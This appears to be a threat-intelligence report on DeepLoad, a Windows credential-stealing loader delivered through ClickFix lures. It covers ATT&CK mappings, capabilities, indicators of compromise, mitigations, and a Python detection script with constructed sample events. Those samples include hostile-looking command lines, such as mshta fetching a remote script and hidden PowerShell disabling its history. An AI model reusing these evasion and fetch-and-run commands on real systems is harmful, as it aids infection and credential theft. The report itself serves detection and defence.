Full Report
A new campaign has leveraged the ClickFix social engineering tactic as a way to distribute a previously undocumented malware loader referred to as DeepLoad. "It likely uses AI-assisted obfuscation and process injection to evade static scanning, while credential theft starts immediately and captures passwords and sessions even if the primary loader is blocked," ReliaQuest researchers Thassanai
Analysis Summary
# Tool/Technique: DeepLoad
## Overview
DeepLoad is a sophisticated malware loader first documented in March 2026. It is distributed via the "ClickFix" social engineering tactic, which tricks users into executing malicious PowerShell commands under the guise of fixing browser or system issues. DeepLoad is characterized by its heavy reliance on AI-assisted obfuscation, memory-only execution, and persistent credential-harvesting capabilities.
## Technical Details
- **Type**: Malware loader / Credential Stealer
- **Platform**: Windows
- **Capabilities**: AI-assisted obfuscation, APC injection, WMI persistence, credential harvesting, browser extension injection, and worm-like spreading via removable media.
- **First Seen**: March 2026 (Reported by ReliaQuest)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566.002 - Phishing: Spearphishing Link] (ClickFix lures)
- **[TA0002 - Execution]**
  - [T1059.001 - Command and Scripting Interpreter: PowerShell]
  - [T1047 - Windows Management Instrumentation]
  - [T1218.005 - System Binary Proxy Execution: Mshta]
- **[TA0003 - Persistence]**
  - [T1546.003 - Event Triggered Execution: WMI Event Subscription]
  - [T1176 - Browser Extensions]
- **[TA0005 - Defense Evasion]**
  - [T1027 - Obfuscated Files or Information] (AI-generated obfuscation)
  - [T1055.004 - Process Injection: Asynchronous Procedure Call]
  - [T1134 - Access Token Manipulation]
  - [T1562.001 - Impair Defenses: Disable or Modify Tools] (disabling PowerShell history)
- **[TA0006 - Credential Access]**
  - [T1555.003 - Credentials from Web Browsers]
- **[TA0007 - Discovery]**
  - [T1120 - Peripheral Device Discovery]
- **[TA0009 - Collection]**
  - [T1560 - Archive Collected Data]
- **[TA0011 - Command and Control]**
  - [T1105 - Ingress Tool Transfer]
## Functionality
### Core Capabilities
- **ClickFix Delivery**: Social engineering that prompts users to copy/paste PowerShell code into the Windows Run dialog (`Win+R`).
- **Credential Harvesting**: Extracts saved browser passwords immediately upon execution.
- **Payload Hidden as System Process**: Renames its executable to `LockAppHost.exe` to mimic legitimate Windows lock screen components.
- **Memory-Only Execution**: Uses `mshta.exe` and PowerShell `Add-Type` to compile C# code into temporary DLLs in memory/temp directories to avoid signature-based detection.
### Advanced Features
- **AI-Assisted Obfuscation**: Uses AI-generated junk code and variable assignments to confuse static analysis tools.
- **APC Injection**: Injects the main payload into a suspended trusted Windows process using Asynchronous Procedure Calls, ensuring no decoded payload touches the disk.
- **WMI Persistence**: Sets up a WMI event subscription to re-infect a machine days later, breaking traditional parent-child process tracking.
- **Worm-like Spreading**: Monitors for USB devices and automatically copies itself using deceptive filenames like `ChromeSetup.lnk` or `AnyDesk.lnk`.
- **Malicious Browser Extension**: Intercepts real-time credentials typed into login pages even if the main loader is quarantined.
## Indicators of Compromise
- **File Names**: `LockAppHost.exe` (malicious version), `ChromeSetup.lnk`, `Firefox Installer.lnk`, `AnyDesk.lnk` (on removable media).
- **Network Indicators**:
  - `TryCloudflare` domains (associated with secondary loaders like Kiss Loader) [Defanged: `*.trycloudflare[.]com`]
- **Behavioral Indicators**:
  - Unexplained `mshta.exe` executions pointing to remote URLs.
  - PowerShell disabling its own history commands (`Set-PSReadlineOption -HistorySaveStyle SaveNothing`).
  - Sudden appearance of new WMI event subscriptions.
  - Creation of randomized DLLs in `%TEMP%` via `csc.exe` (C# compiler).
## Associated Threat Actors
- Currently unattributed (leverages ClickFix infrastructure).
## Detection Methods
- **Behavioral Detection**: Monitor for `mshta.exe` launching PowerShell or `Add-Type` being used to compile C# code on the fly.
- **WMI Monitoring**: Scan for new/suspicious WMI Event Consumers and Filters.
- **Endpoint Monitoring**: Audit the Windows Run dialog usage and PowerShell command line arguments for specific obfuscation patterns.
- **Process Auditing**: Look for `LockAppHost.exe` running outside of its normal context or exhibiting network activity.
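As an added example (not code from the report or from ReliaQuest), the behavioral indicators and detection methods above written as matching rules and run over constructed Sysmon-style process-creation events. The field names, the WmiPrvSE.exe-parent heuristic for children launched by a WMI event consumer, and the assumption that the genuine `LockAppHost.exe` always lives under the Windows directory are mine, not the page's.

```python
# Added example, not code from the ReliaQuest report: match Sysmon-style
# process-creation events against the DeepLoad behavioural indicators above.
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}

def base(path):
    return path.rsplit("\\", 1)[-1].lower()  # lower-cased file name of a Windows path

def match_indicators(ev):
    """Return the names of the indicators one event trips (empty = clean)."""
    img, parent, cl = base(ev["Image"]), base(ev["ParentImage"]), ev["CommandLine"]
    checks = {
        # mshta pointed at a remote URL (ClickFix stage loading script off the web)
        "mshta_remote_url": img == "mshta.exe" and re.search(r"https?://", cl, re.I),
        # mshta acting as the parent of PowerShell
        "mshta_spawns_powershell": parent == "mshta.exe" and img in POWERSHELL,
        # PowerShell turning off its own command history
        "ps_history_disabled": img in POWERSHELL
        and re.search(r"HistorySaveStyle\s+SaveNothing", cl, re.I),
        # Add-Type compiling C# on the fly
        "ps_add_type": img in POWERSHELL and re.search(r"\bAdd-Type\b", cl, re.I),
        # csc.exe writing a DLL into a Temp directory
        "csc_dll_in_temp": img == "csc.exe" and re.search(r"\\temp\\[^\\]+\.dll\b", cl, re.I),
        # LockAppHost.exe outside the Windows directory (assumption: the genuine
        # binary always lives under %SystemRoot%)
        "lockapphost_outside_windows": img == "lockapphost.exe"
        and not ev["Image"].lower().startswith("c:\\windows\\"),
        # child of WmiPrvSE.exe, the host process that runs WMI event consumers
        "wmi_spawned_process": parent == "wmiprvse.exe",
    }
    return [name for name, hit in checks.items() if hit]

def scan(events):
    """Map event index -> tripped indicators, skipping clean events."""
    return {i: h for i, ev in enumerate(events) if (h := match_indicators(ev))}

# Constructed sample events (not real telemetry), Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://lure.example/fix.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "powershell -w hidden "
     "-c \"Set-PSReadlineOption -HistorySaveStyle SaveNothing; Add-Type -TypeDefinition $src\""},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"csc.exe /noconfig /out:C:\Users\u\AppData\Local\Temp\x1y2z3.dll"},
    {"Image": r"C:\Users\u\AppData\Roaming\LockAppHost.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "LockAppHost.exe"},
]
```

Feed `scan()` a list of real process-creation events with the same three fields; any event that trips two or more rules within one session is the chain the page describes (mshta, then PowerShell with history off and `Add-Type`, then `csc.exe` into `%TEMP%`).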
## Mitigation Strategies
- **User Education**: Train staff to recognize "ClickFix" lures and never copy/paste commands into the Win+R dialog from websites.
- **PowerShell Hardening**: Enable Constrained Language Mode and Script Block Logging.
- **Device Control**: Restrict or audit the use of removable media (USB) to prevent worm-like spreading.
- **Attack Surface Reduction**: Block `mshta.exe` from executing unless required for specific business applications.
## Related Tools/Techniques
- **ClickFix**: The social engineering framework used for delivery.
- **Kiss Loader**: A similar loader distributed via WebDAV and TryCloudflare domains.
- **AsyncRAT/Lumina Stealer**: Often seen in similar campaign structures.